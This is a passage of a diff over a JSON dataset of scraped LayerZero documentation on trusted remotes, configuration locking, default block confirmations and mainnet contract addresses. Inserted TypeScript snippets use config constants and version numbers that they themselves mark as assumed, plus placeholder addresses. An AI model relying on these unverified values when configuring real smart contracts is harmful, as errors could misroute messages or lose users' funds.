Previous Receive Messages Next - EVM Guides Advanced Last modified 3mo ago", + "body": "Set Trusted Remotes For a contract using LayerZero, a trusted remote is another contract it will accept messages from. What is a Trusted Remote? A trusted remote is the 40 bytes (for evm-to-evm messaging) that identifies another contract which you will receive messages from within your LayerZero User Application contract. The 40 bytes object is the packed bytes of the remoteAddress + localAddress The reason to care about Trusted Remotes is that from a security perspective contracts should only receive messages from known contracts. Hence, contracts are securely connected by \"setting trusted remotes\" The team has produced this GitHub Repository as an example of how to automate setting trusted remotes. 40 byte Format for EVM <> EVM, A Trusted Remote is 40 bytes. It is the REMOTE contract address concatenated with the LOCAL contract address. Solana, Aptos, et al. & 32 Byte Addresses For NON-evm chains with addresses that are not 20 bytes obviously the Trusted Remotes will not be exactly 40 bytes, but we will regularly use \"40 byte\" Trusted Remotes in the nomenclature. Generate TrustedRemote Using Ethers.js // the trusted remote (or sometimes referred to as the path or pathData) // is the packed 40 bytes object of the REMOTE + LOCAL user application contract addresses let trustedRemote = hre . ethers . utils . solidityPack ( [ 'address' , 'address' ], [ remoteContract . address , localContract . address ] ) Trusted Remote Usage: The Trusted Remote is now used in a few places. Here is a list of which functions expect the trusted remote format: Function Param Is it a trusted remote? 
Endpoint retryPayload() _srcAddress Endpoint hasStoredPayload() _srcAddress Endpoint forceResumeReceive() _srcAddress LzApp setTrustedRemote() _path LzApp isTrustedRemote() _srcAddress lzReceive() _srcAddress Previous Receive Messages Next - EVM Guides Advanced Last modified 1d ago", "labels": [ "Documentation" ] @@ -1642,7 +1634,15 @@ { "title": "UA Configuration Lock", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/ua-custom-configuration/ua-configuration-lock", - "body": "UA Configuration Lock UA's can lock their LayerZero App configurations for full control of config changes. For UAs that want to fully control their config changes & security settings, the below sections describe how to do so. Locking UA configuration guarantees that only UA owners can change their LZ app configs; UAs that opt-in to LayerZero defaults accept LayerZero's future changes to default configurations (i.e. best practice changes to block confirmations & proof libraries etc.) There are 8 settings to fully lock your UA configuration 2 settings on the Endpoint Send Version Receive Version 6 settings on each pathway Inbound Proof Library Inbound Block Confirmations Relayer Outbound Proof Type Outbound Block Confirmations Oracle Steps for locking UA Configuration 1. Set the send version and receive version of your UA on the LayerZero Endpoint. This locks you to a core library version, currently UltraLigntNodeV2. In the event new libraries are implemented, only UA owners can upgrade their core library version. 2. Per pathway, UAs can configure up to all 6 settings and can lock each of these settings individually. For example, if a UA wants a specific Oracle but prefers the defaults for the other 5 settings, the UA only needs to set its configuration for the Oracle. UAs preferring to lock all 6 settings can easily do so. Once locked, only UA owners can make future configuration changes. We provide an interface for UA contracts to set their ILayerZeroUserApplicationConfig . We also provide code snippets here . Note: To lock any of the 6 settings for each pathway, you MUST first lock send & receive versions to a core library. EVM Guides - Previous UA Custom Configuration Next - EVM Guides Code Examples Last modified 15d ago", + "body": "UA Configuration Lock UAs can lock their LayerZero App configurations for full control of config changes. For UAs that want to fully control their config changes & security settings, the below sections describe how to do so. Locking UA configuration guarantees that only UA owners can change their LZ app configs; UAs that opt-in to LayerZero defaults accept LayerZero's future changes to default configurations (e.g. best-practice changes to block confirmations & proof libraries, etc.) There are 8 settings to fully lock your UA configuration 2 settings on the Endpoint Send Version Receive Version 6 settings on each pathway Inbound Proof Library Inbound Block Confirmations Relayer Outbound Proof Type Outbound Block Confirmations Oracle Steps for locking UA Configuration 1. Set the send version and receive version of your UA on the LayerZero Endpoint. This locks you to a core library version, currently UltraLightNodeV2. In the event new libraries are implemented, only UA owners can upgrade their core library version. 2. Per pathway, UAs can configure up to all 6 settings and can lock each of these settings individually. For example, if a UA wants a specific Oracle but prefers the defaults for the other 5 settings, the UA only needs to set its configuration for the Oracle. 
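A hedged sketch of the two locking steps via the ILayerZeroUserApplicationConfig interface referenced in this section. The version numbers, remote chainId, CONFIG_TYPE_ORACLE constant, and the oracle address are assumptions for illustration; confirm them against UltraLightNodeV2 before use:

```ts
import { Contract } from "ethers";
import { ethers } from "hardhat";

const uaConfigAbi = [
  "function setSendVersion(uint16)",
  "function setReceiveVersion(uint16)",
  "function setConfig(uint16 version, uint16 chainId, uint configType, bytes config)",
];

async function lockConfig(uaAddress: string) {
  const [owner] = await ethers.getSigners();
  const ua = new Contract(uaAddress, uaConfigAbi, owner);
  // Step 1: pin send/receive to a specific messaging library version (values assumed).
  await (await ua.setSendVersion(2)).wait();
  await (await ua.setReceiveVersion(2)).wait();
  // Step 2 (per pathway): lock a single setting, e.g. the Oracle, leaving the rest on defaults.
  const CONFIG_TYPE_ORACLE = 6; // assumed constant; check UltraLightNodeV2
  const oracle = ethers.utils.defaultAbiCoder.encode(
    ["address"],
    ["0x0000000000000000000000000000000000000000"] // placeholder oracle address
  );
  await (await ua.setConfig(2, 101, CONFIG_TYPE_ORACLE, oracle)).wait();
}
```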
UAs preferring to lock all 6 settings can easily do so. Once locked, only UA owners can make future configuration changes. We provide an interface for UA contracts to set their ILayerZeroUserApplicationConfig . We also provide code snippets here . Note: To lock any of the 6 settings for each pathway, you MUST first lock send & receive versions to a core library. EVM Guides - Previous UA Custom Configuration Next - EVM Guides Code Examples Last modified 1d ago", "labels": [ "Documentation" ] }, { "title": "EVM (Solidity) Interfaces", "html_url": "https://layerzero.gitbook.io/docs/technical-reference/interfaces/evm-solidity-interfaces", "body": "EVM (Solidity) Interfaces User Application ILayerZeroEndpoint.sol ILayerZeroReceiver.sol ILayerZeroUserApplicationConfig.sol ILayerZeroEndpointLibrary.sol ILayerZeroLibraryReceiver.sol Oracle ILayerZeroOracle.sol Relayer ILayerZeroRelayer.sol These interfaces can be found in the LayerZero GitHub : ILayerZeroValidationLibrary.sol ILayerZeroUltraLightNodeV1.sol Technical Reference - Previous Interfaces Next ILayerZeroReceiver Last modified 21d ago", "labels": [ "Documentation" ] @@ -1650,7 +1650,7 @@ { "title": "Default Config", "html_url": "https://layerzero.gitbook.io/docs/technical-reference/mainnet/default-config", - "body": "Default Config To simplify writing a User Application contract, LayerZero does not require any configuration. In this case, a UA sending messages will be using the system defaults. Note: Should you choose to not manually set your configuration, the Default configuration will automatically be set for your application. The Default configuration is set and owned by the LayerZero Labs Multisig and may be updated in the future. 
The Default Configuration Oracle: Google Cloud Oracle Relayer: LayerZero Labs Library Version (send & receive): UltraLightNodeV2.sol Outbound Proof Type: 1, MPT Outbound Confirmations: Varies per source chain, see below Inbound Proof Library: 1, MPT Inbound Confirmation: Varies per source chain, see below Sending Messages Default _adapterParams Type: Version 1 Gas Amount: 200,000 // These are the default Block Confirmations waited by LayerZero before delivering messages const defaultBlockConfs = { [ ETHEREUM ] : 15 , [ BSC ] : 20 , [ AVALANCHE ] : 12 , [ POLYGON ] : 512 , [ ARBITRUM ] : 20 , [ OPTIMISM ] : 20 , [ FANTOM ] : 5 , [ DFK ] : 10 , [ HARMONY ] : 5 , [ MOONBEAM ] : 10 , [ APTOS ] : 500000 , [ CELO ] : 5 , [ DEXALOT ] : 10 , [ KLAYTN ] : 5 , [ METIS ] : 5 , [ FUSE ] : 5 , [ GNOSIS ] : 5 , [ COREDAO ] : 21 , [ OKX ] : 2 , [ DOS ] : 2 , [ SEPOLIA ] : 10 , [ ZKSYNC ] : 20 , [ ZKPOLYGON ] : 20 , [ MOONRIVER ] : 10 , [ METER ] : 2 , [ NOVA ] : 20 , [ TENET ] : 2 , [ CANTO ] : 2 , [ KAVA ] : 2 , } Transactions originating from the above chains should be delivered after a minimum of the specified source Block Confirmations Previous UltraLightNodeV2 And NonceContract Addresses Next Multisig Wallets Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1658,7 +1658,7 @@ { "title": "LayerZero Labs Relayer.sol Addresses", "html_url": "https://layerzero.gitbook.io/docs/technical-reference/mainnet/layerzero-labs-relayer.sol-addresses", - "body": "LayerZero Labs Relayer.sol Addresses The team operates and maintains a production Relayer for the protocol. Ethereum 0x902f09715b6303d4173037652fa7377e5b98089e BNB Chain 0xa27a2ca24dd28ce14fb5f5844b59851f03dcf182 Avalanche 0xcd2e3622d483c7dc855f72e5eafadcd577ac78b4 Polygon 0x75dc8e5f50c8221a82ca6af64af811caa983b65f Arbitrum 0x177d36dbe2271a4ddb2ad8304d82628eb921d790 Optimism 0x81e792e5a9003cc1c8bf5569a00f34b65d75b017 Fantom 0x52eea5c490fb89c7a0084b32feab854eeff07c82 DFK 0x473132bb594caef281c68718f4541f73fe14dc89 Harmony 0x7cbd185f21bef4d87310d0171ad5f740bc240e26 Dexalot 0x5b19bd330a84c049b62d5b0fc2ba120217a18c1c Celo 0x15e51701f245f6d5bd0fee87bcaf55b0841451b3 Moonbeam 0xcccdd23e11f3f47c37fc0a7c3be505901912c6cc Fuse 0x5b19bd330a84c049b62d5b0fc2ba120217a18c1c Gnosis 0x5b19bd330a84c049b62d5b0fc2ba120217a18c1c Klaytn 0x5b19bd330a84c049b62d5b0fc2ba120217a18c1c Metis 0x5b19bd330a84c049b62d5b0fc2ba120217a18c1c CoreDAO 0xfe7c30860d01e28371d40434806f4a8fcdd3a098 OKT (OKX) 0xfe7c30860d01e28371d40434806f4a8fcdd3a098 Polygon zkEVM 0xa658742d33ebd2ce2f0bdff73515aa797fd161d9 Canto 0x5b19bd330a84c049b62d5b0fc2ba120217a18c1c zkSync Era 0x9923573104957bf457a3c4df0e21c8b389dd43df Moonriver 0xe9ae261d3aff7d3fccf38fa2d612dd3897e07b2d Tenet 0xaab5a48cfc03efa9cc34a2c1aacccb84b4b770e4 Arbitrum Nova 0xa658742d33ebd2ce2f0bdff73515aa797fd161d9 Meter.io 0x442b4bef4d1df08ebbff119538318e21b3c61eb9 Base 0xcb566e3B6934Fa77258d68ea18E931fa75e1aaAa Linea 0xA658742d33ebd2ce2F0bdFf73515Aa797Fd161D9 Previous Mainnet Addresses Next UltraLightNodeV2 And NonceContract Addresses Last modified 23d ago", + "body": "LayerZero Labs Relayer.sol Addresses The team operates and maintains a production Relayer for the protocol. 
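To see which relayer (default or custom) is actually in effect for a UA, the endpoint's config can be read back. A hedged sketch via ILayerZeroEndpoint.getConfig; the configType constant for the relayer (3 here), the library version argument, and the abi-encoded address decoding are assumptions to verify against UltraLightNodeV2:

```ts
import { Contract } from "ethers";
import { ethers } from "hardhat";

const endpointAbi = [
  "function getConfig(uint16, uint16, address, uint) view returns (bytes)",
];

async function readRelayer(endpointAddr: string, ua: string, remoteChainId: number) {
  const endpoint = new Contract(endpointAddr, endpointAbi, ethers.provider);
  const CONFIG_TYPE_RELAYER = 3; // assumed constant; confirm in UltraLightNodeV2
  const raw = await endpoint.getConfig(2, remoteChainId, ua, CONFIG_TYPE_RELAYER); // version 2 assumed = ULNv2
  const [relayer] = ethers.utils.defaultAbiCoder.decode(["address"], raw); // assumes an abi-encoded address
  console.log(`relayer for ${ua} on pathway from chain ${remoteChainId}: ${relayer}`);
}
```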
Ethereum 0x902f09715b6303d4173037652fa7377e5b98089e BNB Chain 0xa27a2ca24dd28ce14fb5f5844b59851f03dcf182 Avalanche 0xcd2e3622d483c7dc855f72e5eafadcd577ac78b4 Polygon 0x75dc8e5f50c8221a82ca6af64af811caa983b65f Arbitrum 0x177d36dbe2271a4ddb2ad8304d82628eb921d790 Optimism 0x81e792e5a9003cc1c8bf5569a00f34b65d75b017 Fantom 0x52eea5c490fb89c7a0084b32feab854eeff07c82 DFK 0x473132bb594caef281c68718f4541f73fe14dc89 Harmony 0x7cbd185f21bef4d87310d0171ad5f740bc240e26 Dexalot 0x5b19bd330a84c049b62d5b0fc2ba120217a18c1c Celo 0x15e51701f245f6d5bd0fee87bcaf55b0841451b3 Moonbeam 0xcccdd23e11f3f47c37fc0a7c3be505901912c6cc Fuse 0x5b19bd330a84c049b62d5b0fc2ba120217a18c1c Gnosis 0x5b19bd330a84c049b62d5b0fc2ba120217a18c1c Klaytn 0x5b19bd330a84c049b62d5b0fc2ba120217a18c1c Metis 0x5b19bd330a84c049b62d5b0fc2ba120217a18c1c CoreDAO 0xfe7c30860d01e28371d40434806f4a8fcdd3a098 OKT (OKX) 0xfe7c30860d01e28371d40434806f4a8fcdd3a098 Polygon zkEVM 0xa658742d33ebd2ce2f0bdff73515aa797fd161d9 Canto 0x5b19bd330a84c049b62d5b0fc2ba120217a18c1c zkSync Era 0x9923573104957bf457a3c4df0e21c8b389dd43df Moonriver 0xe9ae261d3aff7d3fccf38fa2d612dd3897e07b2d Tenet 0xaab5a48cfc03efa9cc34a2c1aacccb84b4b770e4 Arbitrum Nova 0xa658742d33ebd2ce2f0bdff73515aa797fd161d9 Meter.io 0x442b4bef4d1df08ebbff119538318e21b3c61eb9 Base 0xcb566e3B6934Fa77258d68ea18E931fa75e1aaAa Linea 0xA658742d33ebd2ce2F0bdFf73515Aa797Fd161D9 Previous Mainnet Addresses Next UltraLightNodeV2 And NonceContract Addresses Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1666,7 +1666,7 @@ { "title": "Multisig Wallets", "html_url": "https://layerzero.gitbook.io/docs/technical-reference/mainnet/multisig-wallets", - "body": "Multisig Wallets Multisigs Ethereum 0xCDa8e3ADD00c95E5035617F970096118Ca2F4C92 BNB 0x8D452629c5FfCDDE407069da48c096e1F8beF22c Avalanche 0xcE958C3Fb6fbeCAA5eef1E4dAbD13418bc1ba483 Polygon 0xF1a5F92F5F89e8b539136276f827BF1648375312 Arbitrum 0xFE22f5D2755b06b9149656C5793Cb15A08d09847 Optimism 0x2458BAAbfb21aE1da11D9dD6AD4E48aB2fBF9959 Fantom 0x42A36d2E002E38805109905db20FDB7a0B9e481c Metis 0xF7715218344c32Efbf93F81C4C178B2dA0b3b12D Previous Default Config Next - Technical Reference LayerZero Interfaces Last modified 5mo ago", + "body": "Multisig Wallets Multisigs Ethereum 0xCDa8e3ADD00c95E5035617F970096118Ca2F4C92 BNB 0x8D452629c5FfCDDE407069da48c096e1F8beF22c Avalanche 0xcE958C3Fb6fbeCAA5eef1E4dAbD13418bc1ba483 Polygon 0xF1a5F92F5F89e8b539136276f827BF1648375312 Arbitrum 0xFE22f5D2755b06b9149656C5793Cb15A08d09847 Optimism 0x2458BAAbfb21aE1da11D9dD6AD4E48aB2fBF9959 Fantom 0x42A36d2E002E38805109905db20FDB7a0B9e481c Metis 0xF7715218344c32Efbf93F81C4C178B2dA0b3b12D Previous Default Config Next - Technical Reference Interfaces Last modified 6mo ago", "labels": [ "Documentation" ] @@ -1674,7 +1674,7 @@ { "title": "Mainnet Addresses", "html_url": "https://layerzero.gitbook.io/docs/technical-reference/mainnet/supported-chain-ids", - "body": "Mainnet Addresses The omnichain contracts for sending messages Official Endpoint Addresses These are the mainnet contract addresses of the contracts on which you would call send() See testnet here to play around. Note: chainId values are not related to EVM ids. Since LayerZero will span EVM & non-EVM chains the chainId are proprietary to our Endpoints. 
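Because these chainIds are proprietary to LayerZero (not EVM network ids), a small lookup table is handy in scripts. The values below are copied from the mainnet address list that follows in this section:

```ts
// LayerZero mainnet chainIds (not EVM chain ids), from the list below.
const LZ_CHAIN_ID: Record<string, number> = {
  ethereum: 101,
  bsc: 102,
  avalanche: 106,
  polygon: 109,
  arbitrum: 110,
  optimism: 111,
};

// Corresponding Endpoint addresses, also from the list below.
const LZ_ENDPOINT: Record<string, string> = {
  ethereum: "0x66A71Dcef29A0fFBDBE3c6a460a3B5BC225Cd675",
  bsc: "0x3c2269811836af69497E5F486A85D7316753cf62",
  avalanche: "0x3c2269811836af69497E5F486A85D7316753cf62",
};
```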
Ethereum chainId : 101 endpoint : 0x66A71Dcef29A0fFBDBE3c6a460a3B5BC225Cd675 BNB Chain chainId : 102 endpoint : 0x3c2269811836af69497E5F486A85D7316753cf62 Avalanche chainId : 106 endpoint : 0x3c2269811836af69497E5F486A85D7316753cf62 Aptos chainId : 108 endpoint : 0x54ad3d30af77b60d939ae356e6606de9a4da67583f02b962d2d3f2e481484e90 layerzero_apps: 0x43d8cad89263e6936921a0adb8d5d49f0e236c229460f01b14dca073114df2b9 Polygon chainId : 109 endpoint : 0x3c2269811836af69497E5F486A85D7316753cf62 Arbitrum chainId : 110 endpoint : 0x3c2269811836af69497E5F486A85D7316753cf62 Optimism chainId : 111 endpoint : 0x3c2269811836af69497E5F486A85D7316753cf62 Fantom chainId : 112 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 DFK chainId : 115 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Harmony chainId : 116 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Dexalot chainId : 118 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Celo chainId : 125 endpoint : 0x3A73033C0b1407574C76BdBAc67f126f6b4a9AA9 Moonbeam chainId : 126 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Fuse chainId : 138 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Gnosis chainId : 145 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Klaytn chainId : 150 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Metis chainId : 151 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 CoreDAO chainId : 153 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 OKT (OKX) chainId : 155 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Polygon zkEVM chainId : 158 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Canto chainId : 159 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 zkSync Era chainId : 165 endpoint : 0x9b896c0e23220469C7AE69cb4BbAE391eAa4C8da Moonriver chainId : 167 endpoint : 0x7004396C99D5690da76A7C59057C5f3A53e01704 Tenet chainId : 173 endpoint : 0x2D61DCDD36F10b22176E0433B86F74567d529aAa Arbitrum Nova chainId : 175 endpoint : 0x4EE2F9B7cf3A68966c370F3eb2C16613d3235245 Meter.io chainId : 176 endpoint : 0xa3a8e19253Ab400acDac1cB0eA36B88664D8DedF Sepolia This endpoint is connected to Ethereum, Arbitrum, Optimism only on mainnet. chainId : 161 endpoint : 0x7cacBe439EaD55fa1c22790330b12835c6884a91 Kava chainId : 177 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Linea chainId : 183 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Base chainId : 184 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Mantle chainId : 181 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Loot chainId : 197 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 MeritCircle (aka Beam) chainId : 198 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Zora chainId : 195 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Technical Reference - Previous Mainnet Next LayerZero Labs Relayer.sol Addresses Last modified 27d ago", + "body": "Mainnet Addresses The omnichain contracts for sending messages Official Endpoint Addresses These are the mainnet contract addresses of the contracts on which you would call send() See testnet here to play around. Note: chainId values are not related to EVM ids. Since LayerZero will span EVM & non-EVM chains the chainId are proprietary to our Endpoints. 
Ethereum chainId : 101 endpoint : 0x66A71Dcef29A0fFBDBE3c6a460a3B5BC225Cd675 BNB Chain chainId : 102 endpoint : 0x3c2269811836af69497E5F486A85D7316753cf62 Avalanche chainId : 106 endpoint : 0x3c2269811836af69497E5F486A85D7316753cf62 Aptos chainId : 108 endpoint : 0x54ad3d30af77b60d939ae356e6606de9a4da67583f02b962d2d3f2e481484e90 layerzero_apps: 0x43d8cad89263e6936921a0adb8d5d49f0e236c229460f01b14dca073114df2b9 Polygon chainId : 109 endpoint : 0x3c2269811836af69497E5F486A85D7316753cf62 Arbitrum chainId : 110 endpoint : 0x3c2269811836af69497E5F486A85D7316753cf62 Optimism chainId : 111 endpoint : 0x3c2269811836af69497E5F486A85D7316753cf62 Fantom chainId : 112 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 DFK chainId : 115 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Harmony chainId : 116 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Dexalot chainId : 118 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Celo chainId : 125 endpoint : 0x3A73033C0b1407574C76BdBAc67f126f6b4a9AA9 Moonbeam chainId : 126 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Fuse chainId : 138 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Gnosis chainId : 145 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Klaytn chainId : 150 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Metis chainId : 151 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 CoreDAO chainId : 153 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 OKT (OKX) chainId : 155 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Polygon zkEVM chainId : 158 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 Canto chainId : 159 endpoint : 0x9740FF91F1985D8d2B71494aE1A2f723bb3Ed9E4 zkSync Era chainId : 165 endpoint : 0x9b896c0e23220469C7AE69cb4BbAE391eAa4C8da Moonriver chainId : 167 endpoint : 0x7004396C99D5690da76A7C59057C5f3A53e01704 Tenet chainId : 173 endpoint : 0x2D61DCDD36F10b22176E0433B86F74567d529aAa Arbitrum Nova chainId : 175 endpoint : 0x4EE2F9B7cf3A68966c370F3eb2C16613d3235245 Meter.io chainId : 176 endpoint : 0xa3a8e19253Ab400acDac1cB0eA36B88664D8DedF Sepolia This endpoint is connected to Ethereum, Arbitrum, Optimism only on mainnet. 
chainId : 161 endpoint : 0x7cacBe439EaD55fa1c22790330b12835c6884a91 Kava chainId : 177 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Linea chainId : 183 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Base chainId : 184 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Mantle chainId : 181 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Loot chainId : 197 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 MeritCircle (aka Beam) chainId : 198 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Zora chainId : 195 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 OpBNB chainId : 202 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Astar chainId : 210 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Conflux chainId : 212 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Telos chainId : 199 endpoint : 0x66A71Dcef29A0fFBDBE3c6a460a3B5BC225Cd675 Aurora chainId : 211 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Tomo chainId : 196 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Scroll chainId : 214 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 Horizen EON chainId : 215 endpoint : 0xb6319cC6c8c27A8F5dAF0dD3DF91EA35C4720dd7 XPLA chainId : 216 endpoint : 0xC1b15d3B262bEeC0e3565C11C9e0F6134BdaCB36 Technical Reference - Previous Mainnet Next LayerZero Labs Relayer.sol Addresses Last modified 5d ago", "labels": [ "Documentation" ] @@ -1682,7 +1682,7 @@ { "title": "UltraLightNodeV2 And NonceContract Addresses", "html_url": "https://layerzero.gitbook.io/docs/technical-reference/mainnet/ultralightnodev2-and-noncecontract-addresses", - "body": "UltraLightNodeV2 And NonceContract Addresses Ethereum UltraLightNodeV2.sol: 0x4d73adb72bc3dd368966edd0f0b2148401a178e2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 BNB Chain UltraLightNode.sol: 0x4D73AdB72bC3DD368966edD0f0b2148401A178E2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 Avalanche UltraLightNode.sol: 0x4D73AdB72bC3DD368966edD0f0b2148401A178E2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 Polygon UltraLightNode.sol: 0x4D73AdB72bC3DD368966edD0f0b2148401A178E2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 Arbitrum UltraLightNode.sol: 0x4D73AdB72bC3DD368966edD0f0b2148401A178E2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 Optimism UltraLightNode.sol: 0x4D73AdB72bC3DD368966edD0f0b2148401A178E2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 Fantom UltraLightNode.sol: 0x4D73AdB72bC3DD368966edD0f0b2148401A178E2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 Metis UltraLightNode.sol: 0x38dE71124f7a447a01D67945a51eDcE9FF491251 NonceContract.sol: 0x66A71Dcef29A0fFBDBE3c6a460a3B5BC225Cd675 Base UltraLightNode.sol: 0x38dE71124f7a447a01D67945a51eDcE9FF491251 NonceContract.sol: 0x66A71Dcef29A0fFBDBE3c6a460a3B5BC225Cd675 Linea UltraLightNode.sol: 0x38dE71124f7a447a01D67945a51eDcE9FF491251 NonceContract.sol: 0x66A71Dcef29A0fFBDBE3c6a460a3B5BC225Cd675 Table below shows the default send and receive versions which correspond to the UltraLightNodeV2.sol. It is send/recv version 2 for earlier deployments, and 1 for more recently supported chains. 
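A quick way to check which send/receive versions a deployed UA is actually on, per the version note above. The getSendVersion/getReceiveVersion signatures are from ILayerZeroEndpoint; the addresses are placeholders:

```ts
import { Contract } from "ethers";
import { ethers } from "hardhat";

const abi = [
  "function getSendVersion(address) view returns (uint16)",
  "function getReceiveVersion(address) view returns (uint16)",
];

async function checkVersions(endpointAddr: string, ua: string) {
  const endpoint = new Contract(endpointAddr, abi, ethers.provider);
  console.log("send version:", await endpoint.getSendVersion(ua));
  console.log("receive version:", await endpoint.getReceiveVersion(ua));
}
```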
UltraLightNodeV2.sol is the default send & receive version for all chains Previous LayerZero Labs Relayer.sol Addresses Next Default Config Last modified 22d ago", + "body": "UltraLightNodeV2 And NonceContract Addresses Ethereum UltraLightNodeV2.sol: 0x4d73adb72bc3dd368966edd0f0b2148401a178e2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 BNB Chain UltraLightNode.sol: 0x4D73AdB72bC3DD368966edD0f0b2148401A178E2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 Avalanche UltraLightNode.sol: 0x4D73AdB72bC3DD368966edD0f0b2148401A178E2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 Polygon UltraLightNode.sol: 0x4D73AdB72bC3DD368966edD0f0b2148401A178E2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 Arbitrum UltraLightNode.sol: 0x4D73AdB72bC3DD368966edD0f0b2148401A178E2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 Optimism UltraLightNode.sol: 0x4D73AdB72bC3DD368966edD0f0b2148401A178E2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 Fantom UltraLightNode.sol: 0x4D73AdB72bC3DD368966edD0f0b2148401A178E2 NonceContract.sol: 0x5B905fE05F81F3a8ad8B28C6E17779CFAbf76068 Metis UltraLightNode.sol: 0x38dE71124f7a447a01D67945a51eDcE9FF491251 NonceContract.sol: 0x66A71Dcef29A0fFBDBE3c6a460a3B5BC225Cd675 Base UltraLightNode.sol: 0x38dE71124f7a447a01D67945a51eDcE9FF491251 NonceContract.sol: 0x66A71Dcef29A0fFBDBE3c6a460a3B5BC225Cd675 Linea UltraLightNode.sol: 0x38dE71124f7a447a01D67945a51eDcE9FF491251 NonceContract.sol: 0x66A71Dcef29A0fFBDBE3c6a460a3B5BC225Cd675 Table below shows the default send and receive versions which correspond to the UltraLightNodeV2.sol. It is send/recv version 2 for earlier deployments, and 1 for more recently supported chains. UltraLightNodeV2.sol is the default send & receive version for all chains Previous LayerZero Labs Relayer.sol Addresses Next Default Config Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1698,7 +1698,7 @@ { "title": "Default Config", "html_url": "https://layerzero.gitbook.io/docs/technical-reference/testnet/default-config", - "body": "Default Config User Applications default configuration To simplify writing a User Application contract, LayerZero does not require any configuration. In this case, a UA sending messages will be using the system defaults. The Default Configuration Oracle: Industry TSS Oracle (Polygon, Sequoia) Relayer: LayerZero Labs Library Version: 1 Outbound Proof Type: 1, MPT Outbound Confirmations: 4 Inbound Proof Library: 1, MPT Inbound Confirmation: 4 Sending messages Default _adapterParams Type: Version 1 Gas Amount: 200,000 Default Block Confirmation // These are the default amount of block confirmations waiting before delivering messages (TESTNET) const defaultBlockConfs = { [ ChainId . BSC_TESTNET ] : 5 , [ ChainId . FUJI ] : 6 , [ ChainId . MUMBAI ] : 10 , [ ChainId . FANTOM_TESTNET ] : 7 , [ ChainId . SWIMMER_TESTNET ] : 5 , [ 